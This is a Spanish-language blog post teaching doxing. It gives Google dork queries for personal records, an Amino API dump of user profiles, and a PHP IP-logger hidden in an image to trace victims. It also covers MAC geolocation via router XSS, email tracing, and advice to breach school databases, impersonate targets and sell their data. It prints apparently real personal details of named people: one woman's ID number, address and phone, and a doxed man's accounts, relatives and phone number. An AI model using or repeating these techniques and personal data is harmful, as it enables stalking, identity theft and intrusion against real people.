Introducción.
No diré la definición del doxeo por lo que ya lo he dicho antes en un blog que mencionare en este blog más adelante. Espero que disfruten de la lectura y de las técnicas que se aplican en este arte.
Descalimar.
Las técnicas y herramientas para hackear mostradas en este blog son solo con fines educativos. El autor no se responsabiliza por los daños que pueden generar el mal uso de las mismas.
Técnicas.
La gente siempre piensa que por decir cosas tan irrelevantes como; tu edad, nombre, o el nombre de tu mascota, por ejemplo. Creen que no puedes hacer nada por lo que son pequeños detalles sin utilidad, pero para los Doxers esa información es tan relevante para encontrar más información de ti.
El objetivo de un doxer varea mucho ya que puede hallar información valiosa o confidencial y venderla al mejor apostador, o como yo he a veces venderla a la misma persona a la que he atacado para después venderla a otra persona que me pueda dar más de lo que "x" persona me dio, otros pueden usar filtros o búsquedas avanzadas, por ejemplo, usar filtros para encontrar información de usuarios de "Mercado Libre" o usar filtros para saber las notas de estudiantes, pero puedes preguntarte ¿Para qué quiero las notas de estudiantes? No solo salen las notas de los estudiantes sino el colegio, nombres, apellidos, etcétera. Con eso puedes tener la información de muchos sin que ellos sepan o localizar a cada uno de ellos.
Filtros:
inurl:uploads ext:pdf OR ext:txt OR ext:xls site:gov.* OR site:mil.* OR site:edu.* OR site:org.* (@gmail.com || @hotmail.com || @yahoo.com)
"notas" inurl:uploads ext:pdf site:gov.* OR site:mil.* OR site:edu.* OR site:org.* "DNI" "Aprobado"
"curriculum vitae" inurl:UP loas ext:pdf site:gov.* OR site:mil.* OR site:edu.* OR site:org.* "Juan"
site:api.mercadolibre.com/ -items -pictures inurl:users
También puedes aprovechar el nombre de él y si sabes cómo es esa persona, ¡Mejor! ¿Por qué digo mejor? es simple si es persona tiene al rededor -18 y está en la escuela o universidad, puedes ir a la web en donde estudia y sacar la DB de la web, casi todas o la mayoría de esos sitios son vulnerables, yo entre a la web de mi colegio, siendo sincero no saque la DB, porque era algo que no me interesaba, pero me arrepiento. Y si, si se preguntan que al menos pude ver las notas de todos o cambiarlas. (De hecho, yo puse las notas en vez del profesor ya que el servidor estaba fallando)
Hablemos un poco de Robots.txt
El archivo; Robots.txt es un protocolo de la exclusión de robots que subimos en nuestra web para impedir o evitar robots de buscadores que analizan nuestra web, estos robots indexaran la página buscando información como; subdominios, dominios, URLs, etc. No importa si es pública o privada.
Bueno ahora que sabemos mas o menos que es Robots.txt, ¿Por que no lo probramos con amino?
User-agent: *
Disallow: /invite/
Disallow: /api/
Sitemap: http://aminoapps.com/sitemap.xml
Lo primero que vemos es; "User-agent: *"
El comodín "*" especifica el uso de todos los robots para que visiten todos los archivos almacenados en el codigo raiz de la web.
* = ALL = Todos.
Ahora en la siguiente vemos /invite/, primero que todo "/" impide el acceso al Bot o sea que nosotros tenemos hacerlo de forma manual, pero, también hay herramienta que pasan de esta negación. Y los que tiene este comodín son subdirectorios, por ejemplo;
site:aminoapps.com/invite/ veremos todos los links de invitación de algunas comunidades de Amino, podremos entrar sin que un líder nos acepte incluso hay comunidades que borraron, pero la búsqueda ha sido exitosa xD
Ahora con la búsqueda de /API/ a ver que encontramos.
site:aminoapps.com/api/
Como vemos tenemos dos links de ese subdirectorio ¿Que habra?
Pues, no está mal... Hemos doxeado a usuarios.
{
"code": 200,
"result": [
{
"href": "https://aminoapps.com/c/justwatchkr/page/user/eru-chitanda/2G5R_ZJu6fra8jG3vDvBJDv2PjpJkE4raX",
"profile": {
"accountMembershipStatus": 0,
"address": null,
"age": null,
"blogsCount": 0,
"consecutiveCheckInDays": null,
"content": null,
"createdTime": "2018-06-01T16:38:24Z",
"extensions": null,
"gender": null,
"itemsCount": 0,
"joinedCount": 0,
"latitude": null,
"level": 1,
"longitude": null,
"mediaList": null,
"membersCount": 6,
"membershipStatus": 0,
"modifiedTime": "2018-06-01T16:38:24Z",
"mood": null,
"moodSticker": null,
"nickname": "eru chitanda",
"onlineStatus": 2,
"pushEnabled": true,
"race": null,
"reputation": 2,
"role": 0,
"status": 0,
"uid": "83c14d9f-43f8-4a90-9746-2cacbfc89bbe"
},
"voteValue": 4
},
{
"profile": {
"accountMembershipStatus": 0,
"address": null,
"age": null,
"blogsCount": 0,
"consecutiveCheckInDays": null,
"content": null,
"createdTime": "2018-06-01T16:35:39Z",
"extensions": null,
"gender": null,
"itemsCount": 0,
"joinedCount": 0,
"latitude": null,
"level": 1,
"longitude": null,
"mediaList": null,
"membersCount": 7,
"membershipStatus": 0,
"modifiedTime": "2018-06-01T16:35:39Z",
"mood": null,
"moodSticker": null,
"nickname": "Richard",
"onlineStatus": 2,
"pushEnabled": true,
"race": null,
"reputation": 2,
"role": 0,
"status": 0,
"uid": "b2a02dfc-0cd9-4197-a9fd-e783eea96f98"
},
"voteValue": 4
},
{
"href": "https://aminoapps.com/c/justwatchkr/page/user/wu-yi-zheng/LB1e_0dSYfo2ZXE51dzGrqvQllLEdoa4K",
"profile": {
"accountMembershipStatus": 0,
"address": null,
"age": null,
"blogsCount": 0,
"consecutiveCheckInDays": null,
"content": null,
"createdTime": "2018-05-30T09:52:02Z",
"extensions": null,
"gender": null,
"itemsCount": 0,
"joinedCount": 1,
"latitude": null,
"level": 1,
"longitude": null,
"mediaList": null,
"membersCount": 3,
"membershipStatus": 0,
"modifiedTime": "2018-05-30T09:52:02Z",
"mood": null,
"moodSticker": null,
"nickname": "\u5433\u76ca\u653f",
"onlineStatus": 2,
"pushEnabled": true,
"race": null,
"reputation": 0,
"role": 0,
"status": 0,
"uid": "11f0be1b-e003-432e-8890-bdf91f59a108"
},
"voteValue": 4
},
{
"profile": {
"accountMembershipStatus": 0,
"address": null,
"age": null,
"blogsCount": 3,
"consecutiveCheckInDays": null,
"content": null,
"createdTime": "2018-05-11T13:32:36Z",
"extensions": null,
"gender": null,
"itemsCount": 6,
"joinedCount": 0,
"latitude": null,
"level": 3,
"longitude": null,
"mediaList": null,
"membersCount": 13,
"membershipStatus": 0,
"modifiedTime": "2018-05-11T13:32:36Z",
"mood": null,
"moodSticker": null,
"nickname": "Eiga.jp",
"onlineStatus": 2,
"pushEnabled": true,
"race": null,
"reputation": 12,
"role": 102,
"status": 0,
"uid": "2e7b25fd-a251-4539-bad0-3c35b57ee61e"
},
"voteValue": 4
}
]
}
El otro archivo; https://aminoapps.com/sitemapindex.xml.gz harás que descargues un archivo que dentro de el habrá otros, o comunidades de amino explora un poco esas rutas a ver que encuentras no digo más porque quito la diversión...
En el siguiente; http://aminoapps.com/sitemap.xml nos dará 6 links cuales nos servirán para cambiar el idioma de la web, ejemplo;
Antes de hacer esto hice un correo que no contenía nada relevante al Equipo Amino ya que quería que uno de sus trabajadores me respondiera y sacar la ip, host o dominio donde venia ese correo y que servicio usaban para enviar el correo automático; support@aminoapps.com o ayuda@aminoapps.com, y tuve la ip de diferentes personas de amino. Aunque se podria hacer nslookup y ver todas las ips que dispone amino, o hacer ping.
Lo primero que vamos hacer es ir al correo de amino una vez ya respondido los dos correos el de support y el que nos responde. Vamos a los ":" que está al lado del correo y vemos que nos sale muchas opciones, pero solo nos fijaremos en; "mostrar mensaje original"


Ahora le damos en copiar en portapapeles, y seguimos lo siguientes pasos dentro de esta web: https://whatismyipaddress.com/trace-email
-Obtenga instrucciones para ubicar un encabezado para su proveedor de correo electrónico aquí
-Abra el correo electrónico que desea rastrear y encuentre su encabezado
-Copie el encabezado y péguelo en Trace Email Analyzer a continuación
-Presiona el botón "Obtener fuente"
- ¡Desplácese hacia abajo debajo de la casilla para ver los resultados de Trace Email
Ahora sabemos cómo poder rastrear un correo electrónico, también esto sirve para saber que dispositivo está usando, etcétera.
También podemos enviar una imagen cual al verla se pueda obtener la ip de la victima
Código:
<?php
// IpLogger
$datos = "Fecha: " . date('Y-m-d H:i:s') . " - IP: $_SERVER[REMOTE_ADDR] - UserAgent: $_SERVER[HTTP_USER_AGENT] ";
$archivo = fopen("datos.txt", "a");
$fw = fwrite($archivo, "$datos\n");
fclose($archivo);
// Devuelve imagen
$imagen = file_get_contents('https://url.es/imagen.jpg'); // Aquí pondrán la imagen que quieran que aparezca.
header('Content-type: image/jpeg;');
header("Content-Length: " . strlen($imagen));
echo $imagen;
?>
Se invoca con la etiqueta <img src="">
Ahora vamos aclarar el rastreo de Teléfono o por mediante Mac.
Antes de seguir quiero que vean este blog:https://aminoapps.com/c/hacking-gray-hat/page/blog/triangulacion-de-telefonos/X48k_EwigugD7x0Vk5olDJvWGejJlkQk8G
Una vez que te hayas leído ese blog explicare más afondo triangulación. Lo primero que debós saber es que en el proceso matemático se llama trilateración.
¿Qué es la trilateración según Wikipedia?
La trilateración es un método matemático para determinar las posiciones relativas de objetos usando la geometría de triángulos de forma análoga a la triangulación. A diferencia de ésta, que usa medidas de ángulo (junto con al menos una distancia conocida para calcular la localización del sujeto), la trilateración usa las localizaciones conocidas de dos o más puntos de referencia, y la distancia medida entre el sujeto y cada punto de referencia. Para determinar de forma única y precisa la localización relativa de un punto en un plano bidimensional usando sólo trilateración, se necesitan generalmente al menos 3 puntos de referencia.
Cosas que debes de saber.
Esto se aplicaría a los móviles, pero en este caso se usan las antenas para establecer comunicaciones, puede ser de cualquier tipo de comunicaciones, por ejemplo, mensajes, llamadas, redes sociales o solo estando conectado a internet. Esta señal nunca desaparece, aunque, ahora mismo digas el modo avión soluciona todo pues, estas... ¡En lo incorrecto! ¿Por qué? Las comunicaciones entre un móvil/celular/teléfono y antena siempre está en marcha sin importar si está apagado, solo es posible desconectarlo por completo quitándole la batería algo que si usas un celular moderno no puedes sin que se dañe por completo, además, puede que el móvil tenga una reserva interna que disponen algunos celulares. También esta la opción de poner en un congelador, Jaula de Faraday, papel de plata, etc. Cosas en las cuales genere dentro un campo eléctrico nulo. Y esta la que más me gusta destrozar el celular a martillazos.
Un celular tiene dos os uno cual nosotros vemos y utilizamos; Android, iOS, Symbian, BlackBerry OS, etc. El otro os es el que pone en comunicación el celular con las antenas. Ahora que sabemos todo esto bien y que tenemos que tener el móvil conectado por lo menos en 3 puntos (antenas) para tener una posición super exacta de nuestra víctima y aplicar la triangulación mediante antenas, recuerda que también se aplica satelitalmente.
Ahora sí, si leíste el blog que te dije sabrás que esto es completamente difícil.. Ya que no solo debes saber el numero de la víctima sino sus coordenadas o en que antenas está conectado para aplicar esta técnica
Mac
La localización de este en un tiempo ha sido de las más fáciles por el servicio que ha dado una web: http://samy.pl/mapxss/ aunque, muchosss digan ¡Eso es imposible! tiene que pasar por las capas, etc, etc. También pensé lo mismo, pero la web daba con precesión muy exacta de donde vivías al menos podría saber en qué barrio vivías. Esto fue posible gracias a que el autor usaba los servicios de Google para geolizacion.
Esto es lo que dijo para usar el metodo:
El método funciona así:
1. Usted visita un sitio web malicioso (¿por qué las personas son tan malas?)
2. El sitio web tiene un XSS oculto contra su enrutador (en este ejemplo, estoy usando un XSS que descubrí en el Verizon Enrutador FiOS )
3. El XSS obtiene la dirección MAC del enrutador a través de AJAX.
4. La dirección MAC se envía a la persona malintencionada. En el caso de prueba a continuación, me fue enviado (¡no es que sea malicioso!)
5. Luego tomo la dirección MAC y la envío a los Servicios de Localización de Google. Este es un servicio basado en HTTP donde las direcciones MAC del enrutador se asignan a las coordenadas aproximadas de GPS de otras fuentes de datos. No hay NINGUNOS requisitos especiales del navegador, ni un usuario necesita que se le solicite. Yo determiné este protocolo usando navegación basada en la ubicación de Firefox.
6. Agarro las coordenadas y se las enseño en un bonito mapa a continuación.
Y esto fue lo que dijo cuando ya no se pudo usar más:
Desafortunadamente, poco después de mi lanzamiento de este ataque (y presentaciones en Defcon / Blackhat / press ), Google bloqueó mi herramienta y alteró su sistema para evitar que esto funcione. Todavía es explotable, sin embargo, dejaré eso al lector (motivado).
Ahora por saber esto no crean que ahora es imposible de hecho si el pudo ¿Por que no ustedes? El mismo lo dijo "Google bloqueó mi herramienta y alteró su sistema para evitar que esto funcione. Todavía es explotable, sin embargo, dejaré eso al lector" aunque, ya llegando aqui te dire que existe un script para la geocalizacion de la BSSID solo queria animarte e inspirarte, jaja.
Uso: Python whereisbssid.py --M MAC --L
-Ingenieria social
-ingenieria social + Ejecute un archivo que escanee la red y envié la Mac mediante un servidor o como veas mejor
/*Algo asi:
from uuid import getnode as get_mac
mac = '%012X' % get_mac()
print ':'.join(mac[i:i+2] for i in range(0, len(mac), 2))
O este bash que obtiene la ip y la mac
echo off
title IP y MAC
mode con cols=33
mode con lines=3
color 1f
For /F "tokens=14 delims= " %%x IN ('ipconfig') Do set ip=%%x
For /F "tokens=4" %%i IN ('nbtstat -a %ip%') Do set mac=%%i
@echo Direccion IP MAC Address
echo %ip% %mac%
pause>nul
goto EOF
*/
-Estar en la red
-Pueden buscar en la misma comunidades Microsoft:https://social.msdn.microsoft.com/Forums/es-ES/e5c2340e-4bd1-4250-a42a-4fdbf386d87e/obtener-mac-address-desde-webform-aspx?forum=netfxwebes
Fotos, Nicks, Nombres, Apellidos, Numero de celular,DNI.
Tener una foto de la persona que doxeara puedes sacar mucha información incluso saber saber en dónde esta:
Metadatos.
Los Metadatos son datos sobre los datos, como el nombre lo dice son información que tiene dentro o sobre otra información. Con los metadatos puedes conseguir información en la cual puedes ver datos sobre el autor, fecha y hora cuando se hizo o se realizó ese ¨x¨ dato, que usuario modifico ese dato o software que se utilizó para realizarlo como hacer un documento etc, etc. También se podría sacar su ubicación exacta donde se realizó esa foto entre variada información que se podría encontrar en estos datos.


Están programas como Foca que nos pueden facilitar las cosas, pero antes debes saber que los metadatos pueden ser borrados o los metadatos de las imágenes eso lo hace normalmente las redes sociales Facebook, twitter, e incluso Amino, aunque, antes no era así. También se borran mediante Bluetooth, y entre otras redes sociales.
Pero puede mandarte las imágenes por otro medio como tu propio host o tomarla tú mismo la foto mediante un script.


Escaneo de una FOTO por "TODO" internet.
Esto ya ha sido posible incluso por páginas web, pero el problema de estas es que el escaneo que hacen es ver si esa misma foto ha estado en otras redes sociales y hay otras que dicen cumplir lo mencionado, pero, no lo hacen completamente.
La herramienta llamada "EaglEye" nos puede servir ya que lo único que tenemos que tener o darle a EagleEye es la foto de la víctima y nombre después lo que hará es hacer un reconocimiento facial a cada perfil de Facebook hasta encontrar a esa persona y luego usa Google y ImageRaider Reverse Image Search para encontrar esa persona en otras redes sociales ya que termine todo este rollo nos dará un informe en modo PDF
Ya había hecho un blog de este método puedes mirarlo: https://aminoapps.com/c/hacking-gray-hat/page/blog/encontrando-a-una-persona-por-todo-internet-mediante-una-imagen-y-nombre/PMLw_V5fmuDVm6DGYbYYm3zX0dNxnVDDlw


Nicks, Nombres, Apellidos, Numero de celular, DNI.
Cada uno es fácil de conseguir si has tenido existo en algunos de los métodos que he mencionado, pero dirás que el DNI es algo imposible, pero como he dicho si sabes donde estudia puedes entrar al servidor o encontrar una vulnerabilidad de la web en donde estudia para sacar la DB hay posiblemente esta la DNI de "x" persona por lo cual imposible no es. También esta la opción de la ingeniería social hacerse pasar por el para tener "x" información es una buena opcion.
Están los filtros en los cuales puedes echar un vistaso:
Ponemos esto en Google: "curriculum vitae" inurl:uploads ext:pdf site:gov.* OR site:mil.* OR site:edu.* OR site:org.* "Juan"
Y nos saldrá suficiente información sobre personas con ese nombre de hecho nos sale el DNI si quieren pueden hacer una prueba y sacar TODO de ellos, o hacer algo más cool y hacerse pasar por ellos.
DATOS PERSONALES
Nombre: Gregorini Rosanna Verónica
Edad: 57años
D.N.I: 14.043.072
Fecha de Nacimiento: 18/06/1960
Lugar de nacimiento: San Juan
Nacionalidad: Argentina
Domicilio: Barrio Solares de San Juan III casa 18- Capital
Teléfono: 264 - 154125184
E-mail: rosannagregorini@hotmail.com
Nicks, nombres, apellidos.
Los nicks la gente siempre ha tenido la costumbre de utilizarlos en todas las redes sociales, por ejemplo, he doxeado a un líder de una comunidad grande.
Nombre real: Juan Antonio Tonda García
Usuario: juantonda97
Instagram: @juantonda97
Canal de Youtube: https://www.youtube.com/user/csalmeriense89
Twitter: https://twitter.com/JuanTonda97?s=09
Facebook (Primera cuenta): https://www.facebook.com/juanantonio.tondagarcia.1
Nacionalidad: España
Vive ahora en: Londres
Con un solo nick ya se todas sus redes sociales, ahora, apliquemos en doxear su perfil de Facebook si no sabes cómo hacerlo aquí dejo un blog que había hecho: https://aminoapps.com/c/hacking-gray-hat/page/blog/vulnerando-la-privacidad-de-perfiles-de-facebook-doxing/m08E_KxTkueo4E1ba7VzLq0YZ8J776Wr7P
Viendo entre sus amigos me encontrado a este familiar por el método de doxing.
Y ella puso de familiares a otras personas y me encontre a esta persona:https://www.facebook.com/antonio.garciajodar.71/about?lst=100020268576874%3A1110766037%3A1538102491&section=year-overviews
Registrando sus acontecimientos importantes
ACONTECIMIENTOS IMPORTANTES
2012 se casó con Carolina Martinez Garcia
Se casó con Carolina Martinez Garcia
2011
Compromiso con Carolina Martinez Garcia
Compromiso con Carolina Martinez Garcia
Tiene una relación con Carolina Martinez Garcia
2002
Terminó sus estudios en MAESTRIA
2000
Comienzo de los estudios en MAESTRIA
Terminó sus estudios en I.B. ALBORAN
1994
Terminó sus estudios en CP Azcona
Comienzo de los estudios en I.B. ALBORA
1986
Comienzo de los estudios en CP Azcona
¡Espera! Él no tiene en sus familiares a él, entonces se me hizo raro ya que los tenían García, pero quise mejor buscar si el tenía agregado al menos a él y los otros García igualmente. ¡Y si! Efectivamente lo tenían agregado.
Sigamos con la investigación estamos cerca.
Vi en las fotos que le ha dado like y hay otro García de hecho el comento.
Y ha estudiado en esta escuela: http://www.iesbahiadealmeria.com/
El Facebook fue fácil de encontrar con una búsqueda avanzada por internet con nombre y apellido. Ahora bien, le pedi a una persona que si me podria meter a un grupo de ws para ver el número de él que sería este:
Numero de el: +44 7516 842347 y nacio en el año: 1997 edad: 21
Solo queda en hacer una búsqueda muy avanzada para encontrar si al menos conseguimos un correo
Hay páginas webs que ayudan para la búsqueda si desean doxear a una persona dejare los siguientes links y formato que podrian seguir para doxear:
Nombre de usuario
Correos electrónicos
Nombre y apellido reales, sexo.
Fecha de nacimiento
Localización
Nacionalidad
Imágenes, fotos y vídeos.
Preferencias
Números de teléfonos, correos.
Dirección IP
Sitios web donde la persona está registrada (Apartando facebook)
Entorno familiar, amigos, pareja, conocidos, amigos de amigos.
Pasatiempos, trabajo.
Lugares en donde estudió o estudia.
Sus posesiones (Auto, casa, dispositivo móvil)
IP LOGGER LINKS
IP TRAKER LINKS
Otros
Y aquí unos operadores de búsqueda: http://www.googleguide.com/advanced_operators_reference.html
Por ejemplo: Juan intext:juan Antonio Tonda García inurl:www.facebook.com
Toda esta información puede servir hasta para robarle la cuenta de Facebook e incluso amino (Lo digo por lo que tengo guardado)

Grupos de hackers.
El término "Dox" o "Doxing" ha sido usado frecuentemente por grupos hacktivistas como Anonymoues que hizo conocer mas este arte por lo medios de comunicaciones al igual que otros grupos como; AntiSec y LulzSec.
Anonymous ya ha demostrado doxeos grandes como en el 2011 que expone información super detallada de 7.000 miembros de la fuerza del orden. Y en 2014 hizo lo mismo mostrando identidades de la Ku Klux Klan


Opinión y conclusión.
Esto es otra de tantas cosas para creer que la privacidad no existe ni en internet, ni mucho menos fuera de él. No pondré como protegerse de esto porque veo que esta demás si leíste completo el blog por lo cual tendrás que preocuparte tú mismo por tu seguridad recuerda que si harás doxing no te equivoques con otra persona puede salir fatal.
Si usaras este material para el mal solo te deseo toda la suerte posible xD, pero recuerda que también existe un lado del bien el doxing no solo abarca a lastimar a personas los investigadores usan este arte para la localización de una persona, y puede que algún día seas tú esa persona que doxee a personas malas o te doxeen a ti. ###
4chan, 8chan, Doxbin (Desconectado) y una que otra red social de la deeb wep es donde te sugiero subir este material, y si lo vas a subir en una página web asegúrate de que sea super anónima.


Estamos en un mundo donde la privacidad no existe y si eres de esas personas que suelen decir no le preocupa la privacidad porque no tienes nada que ocultar es como decir que no te preocupa la libertad de expresión porque no tienes nada que decir.










Publicar un comentario